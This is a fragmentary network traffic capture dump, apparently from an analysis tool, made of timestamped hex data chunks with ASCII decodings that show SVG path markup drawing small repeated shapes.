                                                                                                                                                                              2023-09-15 05:28:20 UTC6467INData Raw: 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 35 31 2e 33 35 2c 31 31 33 2e 33 31 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d
                                                                                                                                                                              Data Ascii: 3-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M251.35,113.31a2.17,2.17,0,0,1-1,2.82,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M
                                                                                                                                                                              2023-09-15 05:28:20 UTC6483INData Raw: 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 32 38 39 2e 31 2c 31 37 33 2e 35 35 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 34 2c 32 2e 38 34 2c 30 2c 30 2c 31 2c 33 2e 36 36 2e 30 35 2c 32 2e 36 36 2c 32 2e 36 36 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22
                                                                                                                                                                              Data Ascii: 1-4.22-1.19,3.06,3.06,0,0,1,.64-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"/><path class="cls-7" d="M289.1,173.55a2.17,2.17,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.66,2.84,2.84,0,0,1,3.66.05,2.66,2.66,0,0,1,.2,3.61"/><path class="
                                                                                                                                                                              2023-09-15 05:28:20 UTC6499INData Raw: 2c 32 2e 38 33 2c 33 2e 31 38 2c 33 2e 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 32 36 2e 38 36 2c 32 33 33 2e 38 61 32 2e 31 37 2c 32 2e 31 37 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 32 2c 33 2e 31 37 2c 33 2e 31 37 2c 30 2c 30 2c 31 2d 34 2e 32 32 2d 31 2e 31 39 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 34 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 39 2c 32 2e 36 39 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 32 22 2f 3e 3c
                                                                                                                                                                              Data Ascii: ,2.83,3.18,3.18,0,0,1-4.23-1.19,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><path class="cls-7" d="M326.86,233.8a2.17,2.17,0,0,1-1,2.82,3.17,3.17,0,0,1-4.22-1.19,3,3,0,0,1,.64-3.65,2.86,2.86,0,0,1,3.67,0,2.69,2.69,0,0,1,.2,3.62"/><
                                                                                                                                                                              2023-09-15 05:28:20 UTC6515INData Raw: 31 38 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 32 2c 33 2c 33 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 35 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2c 30 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 36 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 37 22 20 64 3d 22 4d 33 36 34 2e 36 32 2c 32 39 34 61 32 2e 31 39 2c 32 2e 31 39 2c 30 2c 30 2c 31 2d 31 2c 32 2e 38 33 2c 33 2e 31 39 2c 33 2e 31 39 2c 30 2c 30 2c 31 2d 34 2e 32 33 2d 31 2e 31 39 2c 33 2e 30 36 2c 33 2e 30 36 2c 30 2c 30 2c 31 2c 2e 36 35 2d 33 2e 36 36 2c 32 2e 38 36 2c 32 2e 38 36 2c 30 2c 30 2c 31 2c 33 2e 36 37 2e 30 35 2c 32 2e 36 38 2c 32 2e 36 38 2c 30 2c 30 2c 31 2c 2e 32 2c 33 2e 36 31 22 2f 3e 3c 70 61 74 68 20 63 6c 61
                                                                                                                                                                              Data Ascii: 18,0,0,1-4.23-1.2,3,3,0,0,1,.65-3.65,2.86,2.86,0,0,1,3.67,0,2.68,2.68,0,0,1,.19,3.62"/><path class="cls-7" d="M364.62,294a2.19,2.19,0,0,1-1,2.83,3.19,3.19,0,0,1-4.23-1.19,3.06,3.06,0,0,1,.65-3.66,2.86,2.86,0,0,1,3.67.05,2.68,2.68,0,0,1,.2,3.61"/><path cla
                                                                                                                                                                              2023-09-15 05:28:20 UTC6531INData Raw: 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 32 39 30 2e 36 34 2c 32 30 32 2e 33 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 32 39 30 2e 33 37 2c 31 39 34 2e 32 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e
                                                                                                                                                                              Data Ascii: ass="cls-9" d="M290.64,202.37a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M290.37,194.29a2,2,0,0,1-.91,2.61,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.
                                                                                                                                                                              2023-09-15 05:28:20 UTC6547INData Raw: 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 32 34 2e 38 33 2c 32 34 31 2e 36 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 32 34 2e 35 36 2c 32 33 33
                                                                                                                                                                              Data Ascii: 8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M324.83,241.65a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.88-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M324.56,233
                                                                                                                                                                              2023-09-15 05:28:20 UTC6563INData Raw: 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 35 39 2e 33 2c 32 38 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2e 30 35 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 35 39 2c 32 38 30 2e 39 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d
                                                                                                                                                                              Data Ascii: 38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M359.3,289a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.62,2.62,0,0,1,3.37.05,2.45,2.45,0,0,1,.18,3.32"/><path class="cls-9" d="M359,280.92a2,2,0,0,1-.91,2.61,2.93,2.93,0,0,1-
                                                                                                                                                                              2023-09-15 05:28:20 UTC6579INData Raw: 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 39 33 2e 34 39 2c 33 32 38 2e 32 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c
                                                                                                                                                                              Data Ascii: 1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M393.49,328.28a2,2,0,0,1-.9,2.6,2.92,2.92,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,
                                                                                                                                                                              2023-09-15 05:28:20 UTC6595INData Raw: 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 38 2c 33 37 35 2e 36 33 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 35 2c 32 2e 34 35 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 32 37 2e 36 39 2c 33 36 37 2e 35 36 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33
                                                                                                                                                                              Data Ascii: ><path class="cls-9" d="M428,375.63a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.45,2.45,0,0,1,.19,3.32"/><path class="cls-9" d="M427.69,367.56a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.3
                                                                                                                                                                              2023-09-15 05:28:20 UTC6611INData Raw: 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 34 36 2e 32 39 2c 31 38 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d
                                                                                                                                                                              Data Ascii: 3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M446.29,189a2,2,0,0,1-.9,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d=
                                                                                                                                                                              2023-09-15 05:28:20 UTC6627INData Raw: 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 39 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 34 38 30 2e 34 39 2c 32 32 38 2e 32 39 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 37 39 2c 32 2e 37 39 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31
                                                                                                                                                                              Data Ascii: ,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,1,3.37,0,2.47,2.47,0,0,1,.19,3.33"/><path class="cls-9" d="M480.49,228.29a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.79,2.79,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.46,2.46,0,0,1
                                                                                                                                                                              2023-09-15 05:28:20 UTC6643INData Raw: 2d 39 22 20 64 3d 22 4d 35 31 35 2c 32 37 35 2e 36 35 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 33 2c 32 2e 39 33 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 31 34 2e 36 38 2c 32 36 37 2e 35 37 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c
                                                                                                                                                                              Data Ascii: -9" d="M515,275.65a2,2,0,0,1-.91,2.6,2.93,2.93,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M514.68,267.57a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.09,2.81,2.81,0,0,1,.6-3.37,2.63,2.63,0,0,
                                                                                                                                                                              2023-09-15 05:28:20 UTC6659INData Raw: 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2e 30 35 2c 32 2e 34 36 2c 32 2e 34 36 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 32 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 39 2e 31 35 2c 33 31 34 2e 39 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 31 2c 32 2e 39 34 2c 32 2e 39 34 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 36 2d 33 2e 33 36 2c 32 2e 36 32 2c 32 2e 36 32 2c 30 2c 30 2c 31 2c 33 2e 33 37 2c 30 2c 32 2e 34 37 2c 32 2e 34 37 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 34 38 2e 38 38 2c 33 30 36 2e
                                                                                                                                                                              Data Ascii: 0,0,1,.59-3.37,2.63,2.63,0,0,1,3.38.05,2.46,2.46,0,0,1,.18,3.32"/><path class="cls-9" d="M549.15,314.92a2,2,0,0,1-.91,2.61,2.94,2.94,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.6-3.36,2.62,2.62,0,0,1,3.37,0,2.47,2.47,0,0,1,.18,3.33"/><path class="cls-9" d="M548.88,306.
                                                                                                                                                                              2023-09-15 05:28:20 UTC6675INData Raw: 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 33 2e 36 32 2c 33 36 32 2e 32 38 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 32 2c 32 2e 39 32 2c 30 2c 30 2c 31 2d 33 2e 38 39 2d 31 2e 31 2c 32 2e 38 2c 32 2e 38 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 36 2c 32 2e 36 33 2c 32 2e 36 33 2c 30 2c 30 2c 31 2c 33 2e 33 38 2c 30 2c 32 2e 34 38 2c 32 2e 34 38 2c 30 2c 30 2c 31 2c 2e 31 38 2c 33 2e 33 33 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 35 38 33 2e 33 34 2c 33 35 34 2e 32 61 32 2c 32 2c 30 2c 30 2c 31 2d 2e 39 31 2c 32 2e 36 2c 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 31 2d 33 2e 38 38 2d 31 2e 30 39 2c 32 2e 38 31 2c 32 2e 38 31 2c 30 2c 30 2c 31 2c 2e 35 39 2d 33 2e 33 37 2c 32 2e 36 34
                                                                                                                                                                              Data Ascii: ss="cls-9" d="M583.62,362.28a2,2,0,0,1-.91,2.6,2.92,2.92,0,0,1-3.89-1.1,2.8,2.8,0,0,1,.59-3.36,2.63,2.63,0,0,1,3.38,0,2.48,2.48,0,0,1,.18,3.33"/><path class="cls-9" d="M583.34,354.2a2,2,0,0,1-.91,2.6,2.91,2.91,0,0,1-3.88-1.09,2.81,2.81,0,0,1,.59-3.37,2.64
                                                                                                                                                                              2023-09-15 05:28:20 UTC6691INData Raw: 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 33 2c 32 34 2e 37 38 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 33 32 39 2e 31 2c 32 36 61 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 33 32 2e 37 33 2c 31 38 2e 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 35 2c 32 2e 33 35 2c 30
                                                                                                                                                                              Data Ascii: ,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M333,24.78a1.61,1.61,0,0,1-.73,2.09A2.34,2.34,0,0,1,329.1,26a2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M332.73,18.3a1.61,1.61,0,0,1-.73,2.09,2.35,2.35,0
                                                                                                                                                                              2023-09-15 05:28:20 UTC6707INData Raw: 2e 32 34 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 36 39 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 30 2e 33 39 2c 35 36 2e 33 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 36 30 2e 31 37 2c 34 39 2e 38 32 61 31 2e 36 31 2c
                                                                                                                                                                              Data Ascii: .24,0,0,1,.47-2.69,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M360.39,56.3a1.61,1.61,0,0,1-.73,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M360.17,49.82a1.61,
                                                                                                                                                                              2023-09-15 05:28:20 UTC6723INData Raw: 33 2c 32 2e 30 39 2c 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2d 33 2e 31 32 2d 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 2c 32 2e 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 37 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 39 22 20 64 3d 22 4d 33 38 37 2e 38 33 2c 38 37 2e 38 32 61 31 2e 36 31 2c 31 2e 36 31 2c 30 2c 30 2c 31 2d 2e 37 33 2c 32 2e 30 39 41 32 2e 33 34 2c 32 2e 33 34 2c 30 2c 30 2c 31 2c 33 38 34 2c 38 39 61 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 2e 34 37 2d 32 2e 37 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 32 2e 37 31 2c 30 2c 32 2c 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 36 38 22 2f 3e 3c 70 61 74
                                                                                                                                                                              Data Ascii: 3,2.09,2.34,2.34,0,0,1-3.12-.88,2.25,2.25,0,0,1,.47-2.7,2.1,2.1,0,0,1,2.71,0,2,2,0,0,1,.15,2.67"/><path class="cls-9" d="M387.83,87.82a1.61,1.61,0,0,1-.73,2.09A2.34,2.34,0,0,1,384,89a2.25,2.25,0,0,1,.47-2.7,2.11,2.11,0,0,1,2.71,0,2,2,0,0,1,.15,2.68"/><pat
